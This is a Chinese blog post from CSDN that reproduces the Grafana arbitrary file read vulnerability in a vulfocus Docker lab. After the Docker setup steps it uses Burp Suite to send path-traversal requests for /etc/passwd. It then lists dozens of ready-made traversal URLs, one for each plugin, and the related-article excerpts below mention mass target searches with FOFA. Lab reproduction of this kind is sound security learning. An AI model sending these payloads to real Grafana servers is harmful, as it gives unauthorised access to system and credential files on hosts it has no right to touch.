Grafana 未授权任意文件读取 0day 漏洞复现

最新推荐文章于 2024-05-11 15:54:54 发布
最新推荐文章于 2024-05-11 15:54:54 发布
阅读量2.9k 收藏
点赞数
分类专栏: 安全测试 文章标签: 安全 Grafana任意文件读取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yoyo_573/article/details/122073483
版权

首先:安装DOCKER DESKTOP网上自行搜教程。太简单了
然后Docker拉取镜像:
docker pull vulfocus/grafana-read_arbitrary_file:latest 拉取本地环境运行
Docker拉取镜像时可能会出现Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: TLS handshake timeout问题
在c盘下,C:\ProgramData\Docker\config\daemon.json”中找到配置文件。 如果daemon.json该文件不存在,可以创建daemon.json添加如下内容
{
“registry-mirrors”: [“https://bytkgxyr.mirror.aliyuncs.com”,“https://registry.docker-cn.com”,“http://hub-mirror.c.163.com”]
}
在这里插入图片描述

完成后执行命令
docker run --name grafana -it vulfocus/grafana-read_arbitrary_file:latest /bin/bash
然后点击浏览器打开
在这里插入图片描述

显示如下:
在这里插入图片描述
最后通过burpsuite来进行漏洞利用。
/public/plugins/alertGroups/…/…/…/…/…/…/…/…/etc/passwd
在这里插入图片描述

当然也Grafana 可能存在其他插件目录:
/public/plugins/alertGroups/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/alertlist/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/alertmanager/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/annolist/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/barchart/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/bargauge/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/canvas/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/cloudwatch/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/dashboard/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/dashlist/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/debug/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/elasticsearch/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/gauge/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/geomap/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/gettingstarted/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/grafana-azure-monitor-datasource/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/grafana/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/graph/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/graphite/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/heatmap/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/histogram/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/influxdb/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/jaeger/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/live/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/logs/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/loki/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/mixed/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/mssql/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/mysql/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/news/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/nodeGraph/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/opentsdb/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/piechart/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/pluginlist/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/postgres/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/prometheus/…/…/…/…/…/…/…/…/etc/passwd
/public/plugins/stat/…/…/…/…/…/…/…/…/etc/passwd

参考:https://nosec.org/home/detail/4914.html

yoyo_573
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Grafana 授权任意文件读取漏洞复现(CVE-2021-43798 )
千寻的博客
12-16 3438
文章目录漏洞名称漏洞编号漏洞描述影响版本fofa漏洞复现步骤修复建议参考链接免责声明 漏洞名称 Grafana 授权任意文件读取 漏洞编号 CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 影响版本 Grafana 8.x fofa app
Grafana 授权任意文件读取漏洞复现
渗透测试研究中心
12-16 5427
1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd 2.获取远程目标linux系统的/etc/passwd密码信息 /public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugin
漏洞防范与应对:从发现到修复的全攻略】Prometheus Alertmanager告警管理器 存在授权访问漏洞,处理过程详解!!!
最新发布
大唐有趣的小胡.
05-11 1296
本文深入剖析了Prometheus Alertmanager告警管理器中存在的授权访问漏洞,并详细阐述了该漏洞的发现、原理扫描及处理过程。该漏洞可能使授权的用户能够访问Alertmanager,进而可能导致安全信息的泄露或系统的恶意操控。文章通过原理扫描揭示了漏洞的成因,同时提供了具体的处理步骤,如权限限制、配置更新和系统重启等。此外,文章还强调了漏洞修复的紧迫性,并给出了防范策略。读者可通过本文全面了解并应对Prometheus Alertmanager的授权访问漏洞,从而确保系统的安全稳定运行。
vulhub系列】CVE-2021-43798 Grafana授权任意文件读取复现
Wiofgb的博客
08-17 1128
记录一次CVE-2021-43798 Grafana授权任意文件读取复现
Grafana授权任意文件读取
Amateur
12-08 398
CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。 该漏洞危害等级:高危 影响范围 经测试,目前最新版本(Grafana v8.2.6)仍存在漏洞。 根据目前FOFA系统最新数据(一年内数据),显示全球范围内(app=“Grafana”)共有 234,937 个相关服务对外
Grafana任意文件读取漏洞(CVE-2021-43798)复现
小小猪的博客
12-24 2177
Grafana任意文件读取漏洞(CVE-2021-43798)复现 漏洞描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 漏洞影响范围: Grafana 8.0.0 - 8.3.0 环境搭建: 采用vulfocus靶场 地址 漏洞复现: ...
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
MrWQ#vulnerability-paper#若依 CMS 0day 任意文件读取 or 授权访问1
07-25
文章来源:Khan 安全攻防实验室若依管理系统后台任意文件读取若依管理系统授权访问。
nc57-任意文件读取漏洞补丁
06-08
nc57_任意文件读取漏洞补丁
Adminer≤4.6.2任意文件读取漏洞1
08-03
【Adminer≤4.6.2任意文件读取漏洞详解】 Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...
Apache Solr最新版任意文件读取0day1
08-03
0x01 正全版本任意读取 (官拒绝修复)默认安装授权情况下,各项配置皆为默认下载 Solr 最新版本复现1. 第步2. 第步0x03 漏洞信息跟进0x04
漏洞复现Grafana任意文件读取漏洞(CVE-2021-43798)_grafana漏洞复现
2401_84437170的博客
04-17 661
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 授权任意访问漏洞(CVE-2022-32275)
murphysec的博客
06-08 9326
CVE-2022-32275漏洞是由于Grafana存在授权访问漏洞,攻击者可以通过特定url,访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md       【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲安全
Grafana 任意文件读取漏洞复现
MrHatSec的博客
03-16 7300
一、漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二、漏洞影响 Grafana 8.x 三、漏洞复现 可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内 查看当前所使用的插件: /api/plugins?embedded=0 http://10.10.12.120:443/api/plugins?embedded=0 读取 /etc/passwd文件 POC: /public/plugins/welcome
Grafana 授权任意文件读取
qq_45770644的博客
12-07 644
Grafana 授权任意文件读取 0day 漏洞
CVE-2021-43798——Grafana 授权任意文件读取
热门推荐
LiBai'S BLOG
12-18 1万+
Grafana 授权任意文件读取~
Grafana 0day漏洞在野利用记录
isxiaole的博客
12-09 4015
漏洞概述 Grafana 是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana 可以在网络浏览器里显示数据图表和警告。需要注意的是该漏洞并不依赖于某个特定的插件,而是因为 Grafana 在解析插件路由的时候没有对输入进行有效过滤造成的任意文件读取漏洞影响 Grafana 是否受影响 8.x 是 漏洞复现 本地搭建Grafana v8.2.6环境(搭建流程此处不再阐述),搭建后访问如下: 访问http://127.0.0.1:3001/l.
Grafana 任意文件读取漏洞复现分析
weixin_45794666的博客
03-02 2911
Grafana 任意文件读取漏洞复现分析 CVE-2021-43798 0x01 前言 概述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 影响范围 Grafana 8.0.0-beta1 - 8.3.0 安全版本 Grafana >= 8.3.1 Grafana >= 8.2.7 Grafana >= 8.1.8 Grafana >= 8.0.7 0x02 环境搭建 do
[文件读取]Grafana授权任意文件读取
wj33333的博客
11-14 419
描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。查看etc/passwd。查看/tmp/flag。
shopxo download 任意文件读取漏洞
09-02
然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值